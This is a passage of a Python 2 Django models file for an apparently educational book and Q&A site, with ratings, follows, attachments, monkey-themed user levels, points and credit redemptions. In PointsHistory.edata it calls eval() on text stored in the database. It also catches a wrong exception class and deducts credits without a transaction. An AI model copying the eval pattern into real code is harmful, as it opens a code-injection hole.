True\n\nclass Renderable:\n TEMPLATE = ''\n RENDER_ARGS = []\n DEFAULT_FLAGS = 'text,addedby,rate,flag,follow,dateadded,context'\n MODEL_DEFAULT_FLAGS = ''\n\n def render(self, context, *args):\n t = template.loader.get_template(self.TEMPLATE)\n\n args = list(args)\n request = context['request']\n\n flags = {}\n\n dflags = parse_flags(self.DEFAULT_FLAGS)\n mdflags = parse_flags(self.MODEL_DEFAULT_FLAGS)\n cur_flags = parse_flags(args.pop(0) if args else '')\n \n flags.update(dflags)\n flags.update(mdflags)\n flags.update(cur_flags)\n\n user_agent = request.META.get('HTTP_USER_AGENT', '')\n if 'MSIE' in user_agent:\n # Disable overlay in IE6 as it causes crash!\n flags['is_overlay'] = False\n \n R = self.RENDER_ARGS\n kwargs = {}\n if args and self.RENDER_ARGS:\n kwargs = dict([(R[i], args[0]) for i in xrange(len(args))])\n\n c = make_context(context)\n c['obj'] = self\n c['args'] = args\n c['kwargs'] = kwargs\n c['flags'] = flags\n c['request'] = request\n c['ref_path'] = context['ref_path'] if 'ref_path' in context else '/'\n c['user'] = request.user\n \n return t.render(c)\n\nclass GroupRenderer:\n GROUP_TEMPLATE = ''\n\n @classmethod\n def render_group(self, items):\n pass\n\nclass ItemGroup(Renderable):\n\n def __init__(self, items):\n self.items = items\n\n def render(self, context, *args):\n # pick last item as group handler\n # not picking first item as it might\n # be a different type\n item = self.items[-1]\n\n klass = item.target.__class__\n return klass.render_group(context, self.items)\n\nclass HasAttachments(models.Model):\n\n attachments = generic.GenericRelation('Attachment',\n content_type_field='target_type',\n object_id_field='target_id')\n\n @property\n def attachments_link(self):\n return '/attachments/%d/%d/' % (self.ctype.id, self.id)\n\n def can_attach(self, user):\n if user.is_superuser or user.is_staff:\n return True\n\n if user == getattr(self, 'user', None):\n return True\n\n if hasattr(self, 'moderators'):\n if user in self.moderators.all():\n return True\n\n def attach(self, user,\n title='', description='',\n url=None, ufile=None):\n\n assert(url or ufile)\n\n a = Attachment.objects.create(attacher=user, title=title,\n description=description,\n target_id=self.id,\n target_type=self.ctype,\n url=url,\n uploaded_file=ufile)\n return a\n\n class Meta:\n abstract = True\n\nclass UploadedFile(models.Model):\n file = models.FileField(upload_to='uploads/%Y/%m/%d')\n checksum = models.CharField(max_length=32, unique=True)\n date_added = models.DateTimeField(auto_now_add=True)\n verified = models.BooleanField()\n uploader = models.ForeignKey(User)\n \n @property\n def user(self):\n return self.uploader\n\nclass Attachment(Referred, RateFlag, Linkable, Renderable, Editable):\n TEMPLATE = 'renderables/attachment.html'\n\n title = models.CharField(max_length=255, blank=True, null=True)\n description = MarkupField(null=True, blank=True)\n\n target_type = models.ForeignKey(ContentType)\n target_id = models.PositiveIntegerField(db_index=True)\n target = generic.GenericForeignKey('target_type', 'target_id')\n\n url = models.TextField(max_length=2048, null=True, blank=True)\n uploaded_file = models.ForeignKey(UploadedFile, null=True)\n date_added = models.DateTimeField(auto_now_add=True)\n attacher = models.ForeignKey(User)\n\n questions = generic.GenericRelation('Question',\n content_type_field='target_type',\n object_id_field='target_id')\n\n def is_target_book(self):\n return bool(get_book(self))\n\n def is_editable_by(self, user):\n book = get_book(self)\n book_editable = False\n if book:\n book_editable = book.is_editable_by(user)\n return Editable.is_editable_by(self, user) or book_editable\n \n @property\n def edit_link(self):\n return '/attachment/edit/%d/' % self.id\n\n @property\n def user(self):\n return self.attacher\n\n @property\n def link(self):\n return '/attachment/%s/%s/' % (self.id, urlsafe(self.title)[:LIMIT])\n\n @property\n def verb(self):\n return 'attached'\n\n class Meta:\n unique_together = ('target_type', 'target_id', 'uploaded_file')\n\nclass Tag(models.Model):\n name = models.CharField(max_length=50, unique=True, db_index=True)\n description = MarkupField(null=True, blank=True)\n\n class Meta:\n ordering = ('name',)\n\n def __unicode__(self):\n return self.name\n\nclass TagItem(models.Model):\n tag = models.ForeignKey(Tag)\n\n item_type = models.ForeignKey(ContentType)\n item_id = models.PositiveIntegerField(db_index=True)\n item = generic.GenericForeignKey('item_type', 'item_id')\n\n class Meta:\n unique_together = (('tag', 'item_type', 'item_id'),)\n\n def __unicode__(self):\n return u'%s [%s]' % (self.item, self.tag)\n\nclass Category(Tagable):\n QUERY_TYPES = (('any', 'Any'), ('all', 'All'))\n name = models.CharField(max_length=100, db_index=True)\n description = MarkupField(null=True, blank=True)\n parent = models.ForeignKey('self', null=True)\n query_type = models.CharField(max_length=8, null=False, blank=False,\n choices=QUERY_TYPES)\n\nclass LeaderBoardData(models.Model):\n\n tag = models.CharField(max_length=32, db_index=True)\n\n target_type = models.ForeignKey(ContentType)\n target_id = models.PositiveIntegerField(db_index=True)\n target = generic.GenericForeignKey('target_type', 'target_id')\n\n def __unicode__(self):\n return '<LeaderBoardData %s: %s>' % (self.tag, self.target)\n\nclass RatingNotification(models.Model):\n time = models.DateTimeField(auto_now_add=True, db_index=True)\n\n target_type = models.ForeignKey(ContentType)\n target_id = models.PositiveIntegerField(db_index=True)\n target = generic.GenericForeignKey('target_type', 'target_id')\n\n num_ratings = models.IntegerField()\n\n def __unicode__(self):\n return '<RatingNotification %s: %s>' % (self.target, self.num_ratings)\n\n\nclass Comment(Referred, Flaggable, Renderable, Editable):\n TEMPLATE = 'renderables/comment.html'\n GROUP_TEMPLATE = 'renderables/comment_group.html'\n\n user = models.ForeignKey(User)\n text = models.TextField(max_length=1024)\n date_added = models.DateTimeField(auto_now_add=True)\n\n target_type = models.ForeignKey(ContentType)\n target_id = models.PositiveIntegerField(db_index=True)\n target = generic.GenericForeignKey('target_type', 'target_id')\n\n @classmethod\n def render_group(self, context, items):\n\n target = items[-1].target.target\n t = template.loader.get_template(self.GROUP_TEMPLATE)\n c = make_context(context)\n c['comments'] = items\n c['target'] = target\n return t.render(c)\n\n def is_editable_by(self, user):\n return Editable.is_editable_by(self, user)\n \n @property\n def edit_link(self):\n return '/comment/edit/%d/' % self.id\n\n @property\n def title(self):\n return 'Comment: %s' % xcode(self.text[:LIMIT])\n\n @property\n def link(self):\n return self.target.link\n\nclass Activity(models.Model, Renderable):\n TEMPLATE = 'renderables/activity.html'\n\n ACTION_TYPES = (('added', 'Added'), ('modified', 'Modified'))\n\n user = models.ForeignKey(User)\n date_added = models.DateTimeField(auto_now_add=True)\n target_type = models.ForeignKey(ContentType)\n target_id = models.PositiveIntegerField(db_index=True)\n target = generic.GenericForeignKey('target_type', 'target_id')\n action = models.CharField(max_length=8, null=False, blank=False,\n default='added', choices=ACTION_TYPES)\n data = models.TextField(max_length=1024, null=True, blank=True)\n\n @classmethod\n def add(self, user, target, action='added', data=None):\n if target is None:\n raise Exception('activity target cannot be None')\n \n a = self.objects.create(user=user, data=repr(data),\n target_type = target.ctype,\n target_id = target.id,\n action=action)\n return a\n\n class Meta:\n ordering = ('-id',)\n\nclass Stream(Titled):\n\n def add(self, activity):\n try:\n sitem = StreamItem.objects.create(stream=self, activity=activity)\n except IntegerField:\n sitem = StreamItem.objects.get(stream=self, activity=activity)\n\n return sitem\n\n def __unicode__(self):\n return 'Stream: %d: %s' % (self.id, self.title)\n\nclass StreamItem(models.Model):\n\n date_added = models.DateTimeField(auto_now_add=True)\n stream = models.ForeignKey(Stream)\n activity = models.ForeignKey(Activity)\n\n class Meta:\n unique_together = ('stream', 'activity')\n\n def __unicode__(self):\n return 'StreamItem: %d of %s: %s' % (self.id, self.stream, self.activity)\n\nclass Question(Referred, RateFlag, HasComments, Linkable, HasAttachments, Renderable, Editable):\n TEMPLATE = 'renderables/question.html'\n MODEL_DEFAULT_FLAGS = 'answercount,topanswer'\n\n user = models.ForeignKey(User)\n text = MarkupField()\n date_added = models.DateTimeField(auto_now_add=True)\n date_updated = models.DateTimeField(auto_now_add=True)\n\n target_type = models.ForeignKey(ContentType)\n target_id = models.PositiveIntegerField(db_index=True)\n target = generic.GenericForeignKey('target_type', 'target_id')\n\n def is_editable_by(self, user):\n book = get_book(self)\n book_editable = False\n if book:\n book_editable = book.is_editable_by(user)\n return Editable.is_editable_by(self, user) or book_editable\n\n @property\n def title(self):\n return 'Question: %s under %s' % (self.text.raw[:LIMIT], self.target.title)\n\n @property\n def top_answer(self):\n # FIXME\n if self.answer_set.all():\n ans = Answer.objects.filter(question=self)[0]\n return ans\n else:\n return None\n\n @classmethod\n def add(self, user, target, text):\n q = self.objects.create(user=user, text=text,\n target_type = target.ctype,\n target_id = target.id)\n return q\n\n class Meta:\n ordering = ('-score',)\n\n @property\n def link(self):\n return '/qa/question/%s/%s/' % (self.id, urlsafe(self.text.raw[:LIMIT]))\n \n def __unicode__(self):\n return self.text.raw\n\nclass Answer(Referred, RateFlag, HasComments, Linkable, HasAttachments, Renderable, Editable):\n TEMPLATE = 'renderables/answer.html'\n\n user = models.ForeignKey(User)\n question = models.ForeignKey(Question)\n text = MarkupField()\n\n date_added = models.DateTimeField(auto_now_add=True)\n date_updated = models.DateTimeField(auto_now_add=True)\n\n def is_editable_by(self, user):\n book = get_book(self)\n book_editable = False\n if book:\n book_editable = book.is_editable_by(user)\n return Editable.is_editable_by(self, user) or book_editable\n\n @property\n def title(self):\n return 'Answer: %s under %s' % (xcode(self.text.raw[:LIMIT]),\n xcode(self.question.text.raw[:LIMIT]))\n\n @property\n def target(self):\n return self.question\n\n class Meta:\n ordering = ('-score',)\n\n @property\n def link(self):\n return self.question.link\n \n def __unicode__(self):\n return self.text.raw\n\nclass FBUserProfile(models.Model):\n user = models.ForeignKey(User, unique=True)\n uid = models.CharField(max_length=100)\n\nclass UserProfile(Referred, RateFlag, Followable, Linkable, Renderable, Editable):\n\n # means: level 1: 0 to 9, level 2: 10 to 19 and so on.\n LEVELS = (10, 20, 40, 60, 80, 120, 160, 200, 240, 300, 360, 420, 500, 600,\n 700, 800, 1000, 1250, 1500, 2000)\n\n LEVEL_NAMES = (\n 'Wild Monkey',\n 'Chattering Monkey',\n 'Cheeky Monkey',\n 'Curious Monkey',\n 'Active Monkey',\n 'Power Monkey',\n 'Brainy Monkey',\n 'Genius Monkey',\n 'Learned Monkey',\n 'Master Monkey',\n 'Vedic Monkey',\n 'Guru Monkey',\n 'Shining Monkey',\n 'Monkey King',\n 'Monk Monkey',\n 'Monkey Monk',\n 'Budding Monk',\n 'Trainee Monk',\n 'Monk-to-be',\n 'Monk'\n )\n \n TEMPLATE = 'renderables/userprofile.html'\n\n user = models.ForeignKey(User, unique=True)\n stream = models.ForeignKey(Stream, unique=True, null=True)\n institution = models.CharField(max_length=200, null=True, blank=True)\n city = models.CharField(max_length=200, null=True, blank=True)\n state = models.CharField(max_length=200, null=True, blank=True)\n country = models.CharField(max_length=200, null=True, blank=True)\n dob = models.DateTimeField(null=True, blank=True)\n sex = models.CharField(max_length=1, null=True, blank=True)\n image = models.ImageField(upload_to='images/user/%Y/%m/%d')\n points = models.IntegerField(db_index=True, default=0)\n credits = models.DecimalField(max_digits=10, decimal_places=2,\n null=False, default=Decimal(str(0.0)))\n mailing_address = models.TextField(null=True, blank=True)\n referrer = models.ForeignKey(User, null=True, db_index=True,\n related_name='referee')\n \n def is_editable_by(self, user):\n return Editable.is_editable_by(self, user)\n\n @property\n def books(self):\n return Book.objects.filter(Q(user=self.user) | Q(moderators__id=self.user.id))\n\n @property\n def following_books(self):\n target_type = ContentType.objects.get_for_model(Book)\n following = Follows.objects.filter(user=self.user,\n target_type=target_type)\n following = QuerySetFilter(following, lambda x: x.target)\n return following\n\n @property\n def referred(self):\n return UserProfile.objects.filter(referrer=self)\n\n @property\n def level(self):\n points = self.points\n\n for index, level_start in enumerate(self.LEVELS):\n if points < level_start:\n return index + 1\n\n return len(self.LEVELS)\n\n @property\n def level_name(self):\n return self.LEVEL_NAMES[self.level - 1]\n\n @property\n def points_for_current_level(self):\n return self.LEVELS[self.level - 1]\n\n def give_points(self, points):\n level = self.level\n self.points += points\n new_level = self.level\n\n if level == new_level:\n return\n\n # notify user and his followers about level change\n followers = [self.user]\n followers.extend([f.user for f in self.followers.all()])\n followers = list(set(followers))\n\n notification.send(followers, 'user_level_changed',\n {'user': self.user})\n\n # award points to referrer\n from core.points import give_points\n give_points('user_level_changed', user=self.user.id,\n prev_level=level, level=new_level)\n\n @property\n def points_history(self):\n return PointsHistory.objects.filter(user=self.user)\n\n @property\n def location(self):\n location = [self.city, self.state, self.country]\n location = [loc or '' for loc in location if loc]\n location = ', '.join(location)\n return location\n\n @property\n def title(self):\n return self.user.get_full_name().strip() or self.user.username\n\n @property\n def note(self):\n return Note.objects.get(target_id=self.id,\n target_type=self.ctype.id)\n \n @property\n def videos(self):\n video_type = ContentType.objects.get_for_model(Video)\n media = AssociatedMedia.objects.filter(user=self.user,\n media_type=video_type)\n return media\n \n @property\n def questions(self):\n return Question.objects.filter(user=self.user)\n \n @property\n def answers(self):\n return Answer.objects.filter(user=self.user)\n \n @property\n def notes(self):\n return Note.objects.filter(user=self.user)\n\n @property\n def comments(self):\n return Comment.objects.filter(user=self.user)\n \n @property\n def following(self):\n target_type = ContentType.objects.get_for_model(UserProfile)\n following = Follows.objects.filter(user=self.user,\n target_type=target_type)\n following = QuerySetFilter(following, lambda x: x.target)\n return following\n \n @property\n def activities(self):\n return Activity.objects.filter(user=self.user)\n\n @property\n def link(self):\n return '/user/%s/' % urlsafe(self.user.username)\n\n @property\n def can_add_book(self):\n return True\n\n def can_edit_book(self, book):\n return book.is_editable_by(self.user)\n\n @property\n def followers_link(self):\n return '/user/%s/followers/' % urlsafe(self.user.username)\n\n @property\n def following_books_link(self):\n return '/user/%s/fbooks/' % urlsafe(self.user.username)\n\n @property\n def following_link(self):\n return '/user/%s/following/' % urlsafe(self.user.username)\n\n\nclass Toppers(models.Model):\n user_profile = models.ForeignKey(UserProfile)\n\nclass Onliners(models.Model):\n user = models.ForeignKey(User)\n\nclass ProfilePost(Referred, RateFlag, HasComments, Renderable, Editable, Linkable):\n TEMPLATE = 'renderables/profilepost.html'\n MODEL_DEFAULT_FLAGS = 'comment'\n\n user = models.ForeignKey(User)\n profile = models.ForeignKey(UserProfile)\n text = models.TextField(max_length=1024)\n date_added = models.DateTimeField(auto_now_add=True)\n\n @property\n def edit_link(self):\n return '/profilepost/edit/%d/' % self.id\n\n @property\n def link(self):\n return '/profilepost/%d/' % self.id\n \n @property\n def target(self):\n return self.profile\n\n @property\n def type(self):\n return 'status'\n\n @property\n def title(self):\n return 'ProfilePost: %s' % (xcode(self.text[:LIMIT]))\n\nclass RedeemableItem(Titled, Renderable):\n TEMPLATE = 'renderables/redeemableitem.html'\n\n description = MarkupField(null=True, blank=True)\n credits = models.DecimalField(max_digits=10, decimal_places=2,\n null=False, default=Decimal(str(0.0)))\n date_added = models.DateTimeField(auto_now_add=True, db_index=True)\n image = models.ImageField(upload_to='images/%Y/%m/%d')\n num = models.IntegerField(null=False, default=1, db_index=True)\n\n @property\n def link(self):\n return '/redeemable/%d/%s/' % (self.id, urlsafe(self.title[:LIMIT]))\n\n def __unicode__(self):\n return self.title\n\nclass Redemption(Referred, Renderable):\n TEMPLATE = 'renderables/redemption.html'\n\n date_added = models.DateTimeField(auto_now_add=True)\n user = models.ForeignKey(User)\n items = models.ManyToManyField(RedeemableItem, through='RedemptionItem')\n credits = models.DecimalField(max_digits=10, decimal_places=2,\n null=False, default=Decimal(str(0.0)))\n date_processed = models.DateTimeField(null=True)\n \n @property\n def link(self):\n return '/redemption/%d/' % self.id\n\n @property\n def verb(self):\n return 'redeemed'\n\n @property\n def title(self):\n return 'Redemption by %s (order no: %d)' % \\\n (self.user.get_profile().title, self.id)\n\n def __unicode__(self):\n return 'order %d for user %s for %s credits' % (self.id,\n self.user, self.credits)\n\n @classmethod\n def add(self, cart_data, user):\n cart = []\n total_credits = Decimal('0.0')\n\n for item_id, num in cart_data:\n item = RedeemableItem.objects.get(id=int(item_id))\n\n if item.num < num:\n return\n\n total_credits += (item.credits * num)\n cart.append([item, num])\n\n total_credits += HANDLING_CREDITS\n\n profile = user.get_profile()\n if profile.credits < total_credits:\n return\n\n redemption = self.objects.create(user=user, credits=total_credits)\n\n for item, num in cart:\n r = RedemptionItem.objects.create(redemption=redemption, item=item, num=num)\n item.num -= num\n item.save()\n \n profile.credits -= total_credits\n profile.save()\n\n return redemption\n\nclass RedemptionItem(models.Model, Renderable):\n TEMPLATE = 'renderables/redemptionitem.html'\n\n redemption = models.ForeignKey(Redemption)\n item = models.ForeignKey(RedeemableItem)\n num = models.IntegerField(null=False, default=1)\n \n def __unicode__(self):\n return '%s item %d nos for order %d' % (self.item.title,\n self.num, self.redemption.id)\n\nclass PointsHistory(Renderable, Referred):\n TEMPLATE = 'renderables/pointshistory.html'\n GROUP_TEMPLATE = 'renderables/pointshistory_group.html'\n\n user = models.ForeignKey(User, db_index=True)\n date_added = models.DateTimeField(auto_now_add=True, db_index=True)\n points = models.IntegerField()\n code = models.CharField(max_length=32)\n data = models.TextField(max_length=2000)\n\n @property\n def edata(self):\n edata = eval(self.data)\n\n if 'target_type' in edata and 'target' in edata:\n target = get_target(edata['target_type'], edata['target'])\n edata['target'] = target\n del edata['target_type']\n\n return edata\n\n @property\n def has_all_rated_data(self):\n edata = self.edata\n return self.code == 'rated' and 'position' in edata\n\n @property\n def target(self):\n if self.code == 'rated':\n return self.edata['target']\n\n elif self.code == 'user_level_changed':\n try:\n return User.objects.get(id=self.edata['user']).get_profile()\n except ObjectDoesNotExist:\n pass\n\n @property\n def is_for_adding(self):\n edata = self.edata\n\n if not self.code == 'rated':\n return False\n\n if not self.has_all_rated_data:\n return False\n\n if isinstance(edata['target'], UserProfile):\n return False\n\n return edata['position'] == 0\n\n @property\n def get_rating(self):\n if not self.code == 'rated':\n return None\n\n return self.edata['target'].ratings.get(user=self.user)\n\n @property\n def verb(self):\n verb = 'rated'\n edata = self.edata\n\n if self.code == 'rated':\n if self.is_for_adding:\n verb = 'adding'\n else:\n verb = 'liking' if self.get_rating.rating == Ratings.UP else 'disliking'\n\n elif self.code == 'user_level_changed':\n verb = 'referring'\n\n return verb\n\n @property\n def has_gained(self):\n return self.points > 0\n\n @property\n def signed_points(self):\n return '+%s' % self.points if self.has_gained else str(self.points)\n\n @property\n def sign(self):\n return '+' if self.has_gained else '-'\n\n @classmethod\n def render_group(self, context, items):\n\n activities = items[:]\n \n # group by user\n items.sort(key=lambda x: x.target.user.username)\n groups = groupby(items, lambda x: x.target.user)\n groups = [(k, list(citems)) for k, citems in groups]\n\n t = template.loader.get_template(self.GROUP_TEMPLATE)\n c = make_context(context)\n c['groups'] = groups\n c['activities'] = activities\n return t.render(c)\n\n @property\n def title(self):\n return '%s for %s %s' % (self.signed_points, self.verb, self.target.title)\n \n def __unicode__(self):\n return '<Points \"%s:%d\" for \"%s\">' % (self.code, self.points, self.user)\n\n class Meta:\n ordering = ('-date_added',)\n\nclass Note(Referred, RateFlag, Linkable, HasAttachments, Editable, Renderable):\n TEMPLATE = 'renderables/note.html'\n\n text = MarkupField()\n date_added = models.DateTimeField(auto_now_add=True)\n date_updated = models.DateTimeField(auto_now_add=True)\n user = models.ForeignKey(User, null=True)\n \n target_type = models.ForeignKey(ContentType)\n target_id = models.PositiveIntegerField(db_index=True)\n target = generic.GenericForeignKey('target_type', 'target_id')\n \n questions = generic.GenericRelation(Question,\n content_type_field='target_type',\n object_id_field='target_id')\n\n def is_editable_by(self, user):\n book = get_book(self)\n book_editable = False\n if book:\n book_editable = book.is_editable_by(user)\n return Editable.is_editable_by(self, user) or book_editable\n\n @classmethod\n def add(self, target, text='', user=None):\n q = self.objects.create(text=text, user=user, flagcount=0,\n target_type = target.ctype,\n target_id = target.id)\n return q\n\n class Meta:\n unique_together = ('target_type', 'target_id', 'user')\n ordering = ('-score',)\n \n @property\n def title(self):\n return 'Note: %s' % self.target.title\n\n @property\n def link(self):\n return '/note/%s/' % self.id\n\nif not reversion.is_registered(Note):\n reversion.register(Note, fields=['text', '_text_rendered'])\n\nclass Content(Referred, Linkable):\n date_added = models.DateTimeField(auto_now_add=True)\n _notes = generic.GenericRelation(Note, default='',\n content_type_field='target_type',\n object_id_field='target_id')\n questions = generic.GenericRelation(Question,\n content_type_field='target_type',\n object_id_field='target_id')\n\n def __unicode__(self):\n return self.title\n\n class Meta:\n abstract = True\n\n @property\n def notes(self):\n return self._notes.all()\n\n @property\n def note(self):\n notes = self._notes.all()[:1]\n return notes[0] if notes else None\n \n def user_note(self, user):\n if not user.is_authenticated():\n return\n\n try:\n return self._notes.get(user=user)\n except ObjectDoesNotExist:\n return\n\nclass PrimaryContent(Content, Titled, RateFlag, HasAttachments):\n\n class Meta:\n abstract = True\n\n @property\n def images(self):\n target_type = ContentType.objects.get_for_model(self)\n image_type = ContentType.objects.get_for_model(Image)\n\n media = AssociatedMedia.objects.filter(target_type=target_type,\n target_id=self.id,\n media_type=image_type)\n return media\n\n @property\n def videos(self):\n target_type = ContentType.objects.get_for_model(self)\n video_type = ContentType.objects.get_for_model(Video)\n media = AssociatedMedia.objects.filter(target_type=target_type,\n target_id=self.id,\n media_type=video_type)\n return media\n\nclass Book(PrimaryContent, Followable, Tagable, Renderable, Editable):\n TEMPLATE = 'renderables/book.html'\n MODEL_DEFAULT_FLAGS = 'overlay'\n\n user = models.ForeignKey(User, null=False, default=1)\n stream = models.ForeignKey(Stream, unique=True, null=True)\n moderators = models.ManyToManyField(User, related_name='moderator')\n\n file = models.FileField(upload_to='books/%Y/%m/%d')\n cover_image = models.ImageField(upload_to='images/%Y/%m/%d')\n isbn = models.CharField(max_length=255, null=True, blank=True)\n\n @property\n def link(self):\n return '/book/%s/%s/' % (self.id, urlsafe(self.title[:LIMIT]))\n \n @property\n def moderators_link(self):\n return '/book/moderators/%s/' % (self.id)\n \n @property\n def request_moderation_link(self):\n return '/book/request-moderation/%s/' % (self.id)\n \n @property\n def edit_link(self):\n return '/book/edit/%s/' % (self.id)\n\n def _get_book_data(self):\n data = []\n topics = self.node_set.filter(parent=None).order_by('order')\n\n for t in topics:\n data.append(t.get_json(0))\n\n return data\n\n @property\n def outline_json(self):\n data = self._get_book_data()\n return json.dumps(data)\n\n def _prepare_data(self, nodes, parent):\n flat_nodes = []\n\n for index, node in enumerate(nodes):\n _id = node['attributes'].get('id', None)\n _id = int(_id) if _id is not None else None\n node['attributes']['id'] = _id\n\n node['order'] = index\n node['parent'] = parent\n flat_nodes.append(node)\n\n children = node.get('children', [])\n flat_nodes.extend(self._prepare_data(children, node))\n\n return flat_nodes\n\n def _add_nodes(self, nodes):\n for index, node in enumerate(nodes):\n _id = node['attributes']['id']\n\n if _id is None:\n title = node['data']['title']\n order = node['order']\n parent = node['parent']\n if parent is not None:\n p_id = parent['attributes']['id']\n parent = Node.objects.get(id=p_id)\n\n n = Node.objects.create(title=title, book=self,\n parent=parent, order=order)\n node['attributes']['id'] = n.id\n\n children = node.get('children', [])\n self._add_nodes(children)\n\n def _delete_nodes(self, nodes):\n db_nodes = self.node_set.all()\n db_ids = set([n.id for n in db_nodes])\n cur_ids = set([n['attributes']['id'] for n in nodes])\n\n ids = db_ids - cur_ids\n\n for n in db_nodes:\n if n.id in ids:\n n.delete()\n\n def _update_nodes(self, nodes):\n db_nodes = dict([(n.id, n) for n in self.node_set.all()])\n\n for n in nodes:\n parent = n['parent']\n if parent is not None:\n parent = db_nodes[parent['attributes']['id']]\n\n _id = n['attributes']['id']\n db_node = db_nodes[_id]\n db_node.title = n['data']['title']\n db_node.order = n['order']\n db_node.parent = parent\n db_node.save()\n \n def update_json(self, data):\n nodes = json.loads(data)\n if not isinstance(nodes, list):\n nodes = [nodes]\n flat_nodes = self._prepare_data(nodes, None)\n \n self._add_nodes(nodes)\n self._update_nodes(flat_nodes)\n self._delete_nodes(flat_nodes)\n\n def is_editable_by(self, user):\n is_moderator = user in self.moderators.all()\n return Editable.is_editable_by(self, user) or is_moderator\n\nclass Node(PrimaryContent, Editable, Renderable):\n TEMPLATE = 'renderables/node.html'\n\n file = models.FileField(upload_to='nodes/%Y/%m/%d')\n book = models.ForeignKey(Book)\n parent = models.ForeignKey('self', null=True)\n order = models.IntegerField()\n\n class Meta:\n unique_together = ('title', 'parent', 'order')\n\n def is_editable_by(self, user):\n book = get_book(self)\n book_editable = False\n if book:\n book_editable = book.is_editable_by(user)\n return Editable.is_editable_by(self, user) or book_editable\n\n @property\n def link(self):\n return '/node/%s/%s/' % (self.id, urlsafe(self.title[:LIMIT]))\n\n @property\n def target(self):\n return self.book\n\n @property\n def subnodes(self):\n return Node.objects.filter(parent=self).order_by('order')\n\n def get_json(self, depth=0):\n data = {'attributes': {'id': self.id},\n 'data': {\n 'title': self.title,\n 'attributes': {'class': 'edit-tree-node'},\n },\n }\n if self.subnodes:\n data['state'] = 'open',\n data['children'] = [c.get_json(depth+1) for c in self.subnodes]\n\n return data\n\n def __unicode__(self):\n return '%s under %s' %(self.title, self.parent)\n\n @property\n def previous(self):\n if self.order == 0:\n return self.parent or self.book\n\n else:\n return Node.objects.get(parent=self.parent, book=self.book,\n order=self.order-1)\n\n @property\n def next(self):\n \n node = None\n\n try:\n return Node.objects.get(parent=self,\n book=self.book,\n order=0)\n except ObjectDoesNotExist:\n pass\n\n try:\n return Node.objects.get(parent=self.parent,\n book=self.book,\n order=self.order+1)\n\n except ObjectDoesNotExist:\n pass\n\n if self.parent:\n p = self.parent\n porder = p.order\n\n try:\n return Node.objects.get(parent=p.parent,\n book=p.book,\n order=porder+1)\n except ObjectDoesNotExist:\n pass\n\n def activity_count(self):\n '''\n Number of activities done on this node.\n (questions + nodes)\n '''\n return len(self.notes) + len(self.questions.all())\n\nclass AssociatedMedia(Content, RateFlag, Renderable):\n TEMPLATE = 'renderables/video.html'\n MODEL_DEFAULT_FLAGS = 'overlay'\n\n user = models.ForeignKey(User)\n \n target_type = models.ForeignKey(ContentType, related_name=\"target type\")\n target_id = models.PositiveIntegerField(db_index=True)\n target = generic.GenericForeignKey('target_type', 'target_id')\n\n media_type = models.ForeignKey(ContentType, related_name=\"media type\")\n media_id = models.PositiveIntegerField(db_index=True)\n media = generic.GenericForeignKey('media_type', 'media_id')\n\n @classmethod\n def add(self, user, target, media):\n\n amedia = self.objects.create(user=user,\n target_type=target.ctype,\n target_id=target.id,\n media_type=media.ctype,\n media_id=media.id)\n return amedia\n \n @property\n def title(self):\n return self.media.title\n\n @property\n def link(self):\n amedia = 'video' if isinstance(self.media, Video) else 'image'\n return '/%s/%s/%s/' % (amedia, self.id, urlsafe(self.title[:LIMIT]))\n\n class Meta:\n unique_together = ('user', 'target_type', 'target_id', 'media_type', 'media_id')\n ordering = ('-score',)\n\n def __unicode__(self):\n return '%s of %s' % (self.media, self.target)\n\nclass Ratings(Renderable, Referred, GroupRenderer):\n TEMPLATE = 'renderables/rating.html'\n GROUP_TEMPLATE = 'renderables/rating_group.html'\n\n UP = 1\n DOWN = -1\n\n user = models.ForeignKey(User)\n date_added = models.DateTimeField(auto_now_add=True)\n rating = models.IntegerField()\n\n target_type = models.ForeignKey(ContentType)\n target_id = models.PositiveIntegerField(db_index=True)\n target = generic.GenericForeignKey('target_type', 'target_id')\n\n @property\n def verb(self):\n return 'liked' if self.rating == self.UP else 'disliked'\n\n @classmethod\n def render_group(self, context, items):\n \n # group by user\n groups = groupby(items, lambda x: x.target.user)\n groups = [(k, list(citems)) for k, citems in groups]\n\n subgrouped = []\n for user, activities in groups:\n\n # group by rating\n activities.sort(key=lambda x: x.target.rating)\n activities = groupby(activities, lambda x: x.target.rating)\n activities = dict([(k, list(citems)) for k, citems in activities])\n\n subgroup = {'liked': activities.get(Ratings.UP, []),\n 'disliked': activities.get(Ratings.DOWN, [])}\n\n for rating, activities in subgroup.iteritems():\n # group by object type\n activities.sort(key=lambda x: x.target.target.__class__.__name__)\n activities = groupby(activities, lambda x: x.target.target.__class__.__name__)\n activities = dict([(k, list(citems)) for k, citems in activities])\n\n subgroup[rating] = activities\n\n if not subgroup['liked']:\n del subgroup['liked']\n \n if not subgroup['disliked']:\n del subgroup['disliked']\n\n subgrouped.append((user, subgroup))\n\n t = template.loader.get_template(self.GROUP_TEMPLATE)\n c = make_context(context)\n c['groups'] = subgrouped\n c['activities'] = items\n return t.render(c)\n\n class Meta:\n unique_together = ('user', 'target_id', 'target_type')\n\n def __unicode__(self):\n return '%s rated for %s' % (self.user, self.target)\n\nclass Follows(Renderable, Referred):\n TEMPLATE = 'renderables/follow.html'\n\n user = models.ForeignKey(User)\n date_added = models.DateTimeField(auto_now_add=True)\n\n target_type = models.ForeignKey(ContentType)\n target_id = models.PositiveIntegerField(db_index=True)\n target = generic.GenericForeignKey('target_type', 'target_id')\n\n @property\n def verb(self):\n return 'is now following'\n\n class Meta:\n unique_together = ('user', 'target_id', 'target_type')\n\n def __unicode__(self):\n return '%s for %s' % (self.user, self.target)\n\nclass Flags(Renderable, Referred):\n TEMPLATE = 'renderables/flag.html'\n\n user = models.ForeignKey(User)\n date_added = models.DateTimeField(auto_now_add=True)\n\n target_type = models.ForeignKey(ContentType)\n target_id = models.PositiveIntegerField(db_index=True)\n target = generic.GenericForeignKey('target_type', 'target_id')\n\n @property\n def verb(self):\n return 'flagged'\n\n class Meta:\n unique_together = ('user', 'target_id', 'target_type')\n\n def __unicode__(self):\n return '%s for %s' % (self.user, self.target)\n\nclass Video(Referred, Titled, Renderable):\n user = models.ForeignKey(User)\n date_added = models.DateTimeField(auto_now_add=True)\n source = models.CharField(max_length=100)\n source_id = models.CharField(max_length=200)\n\n def render(self, *args, **kwargs):\n return ''\n\n class Meta:\n unique_together = ('source', 'source_id')\n\n def __unicode__(self):\n return '%s for %s' %(self.source_id, self.title)\n \nclass Image(Referred, Titled):\n file = models.ImageField(upload_to='images/%Y/%m/%d')\n url_hash = models.CharField(max_length=32)\n url = models.TextField(max_length=2000)\n page_url = 